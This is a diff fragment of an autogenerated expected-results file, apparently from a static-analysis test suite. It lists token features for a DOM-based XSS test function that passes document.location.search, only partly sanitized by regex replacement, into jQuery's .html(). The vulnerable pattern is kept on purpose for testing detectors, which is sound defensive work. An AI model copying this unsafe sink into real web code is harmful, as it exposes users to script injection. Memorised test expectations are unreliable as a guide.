autogenerated/Xss/DomBasedXss/tst.js:428:7:428:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:12 | target | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:12 | target | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:12 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target ... .search | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target ... .search | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:7:428:39 | target ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:23 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:23 | document | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:23 | document | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:23 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:32 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:32 | document.location | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:32 | document.location | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:32 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:39 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:39 | documen ... .search | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:39 | documen ... .search | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:16:428:39 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:25:428:32 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:428:25:428:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:428:25:428:32 | location | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:25:428:32 | location | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:25:428:32 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:428:34:428:39 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:428:34:428:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:428:34:428:39 | search | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:428:34:428:39 | search | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:428:34:428:39 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:3 | $ | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:3 | $ | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | $("#foo") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | $("#foo") | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | $("#foo") | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | exceptional return of $("#foo") | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | exceptional return of $("#foo") | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | exceptional return of $("#foo") | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:11 | exceptional return of $("#foo") | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:16 | $("#foo").html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:16 | $("#foo").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:16 | $("#foo").html | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:16 | $("#foo").html | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:16 | $("#foo").html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | $("#foo ... ata>')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | $("#foo ... ata>')) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | $("#foo ... ata>')) | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | $("#foo ... ata>')) | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | $("#foo ... ata>')) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | exceptional return of $("#foo ... ata>')) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | exceptional return of $("#foo ... ata>')) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | exceptional return of $("#foo ... ata>')) | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | exceptional return of $("#foo ... ata>')) | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:3:430:90 | exceptional return of $("#foo ... ata>')) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:430:5:430:10 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:430:5:430:10 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:430:5:430:10 | "#foo" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17572,6 +122281,26 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:430:5:430:10 | "#foo" | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | | autogenerated/Xss/DomBasedXss/tst.js:430:5:430:10 | "#foo" | enclosingFunctionName | nonGlobalSanitizer | | autogenerated/Xss/DomBasedXss/tst.js:430:5:430:10 | "#foo" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:13:430:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:13:430:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:13:430:16 | html | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:13:430:16 | html | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:13:430:16 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:23 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:23 | target | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:23 | target | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:31 | target.replace | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:31 | target.replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:31 | target.replace | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:31 | target.replace | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:31 | target.replace | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | exceptional return of target. ... data>') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | exceptional return of target. ... data>') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | exceptional return of target. ... data>') | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | exceptional return of target. ... data>') | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | exceptional return of target. ... data>') | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | target. ... data>') | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | target. ... data>') | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | target. ... data>') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17579,6 +122308,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | target. ... data>') | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | | autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | target. ... data>') | enclosingFunctionName | nonGlobalSanitizer | | autogenerated/Xss/DomBasedXss/tst.js:430:18:430:89 | target. ... data>') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:430:25:430:31 | replace | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:430:25:430:31 | replace | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:430:25:430:31 | replace | enclosingFunctionBody | target document location search $ #foo html target replace /[\\s\\S]*<\\/metadata>/ $ #foo html target replace /<\|>/g | +| autogenerated/Xss/DomBasedXss/tst.js:430:25:430:31 | replace | enclosingFunctionName | nonGlobalSanitizer | +| autogenerated/Xss/DomBasedXss/tst.js:430:25:430:31 | replace | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:430:33:430:63 | // | CalleeFlexibleAccessPath | target.replace | | autogenerated/Xss/DomBasedXss/tst.js:430:33:430:63 | // | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:430:33:430:63 | // | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17595,6 +122329,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:430:66:430:88 | '' | enclosingFunctionName | nonGlobalSanitizer | | autogenerated/Xss/DomBasedXss/tst.js:430:66:430:88 | '' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:430:66:430:88 | '' | receiverName | target | +| autogenerated/Xss/DomBasedXss/tst.js:432:3:432:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 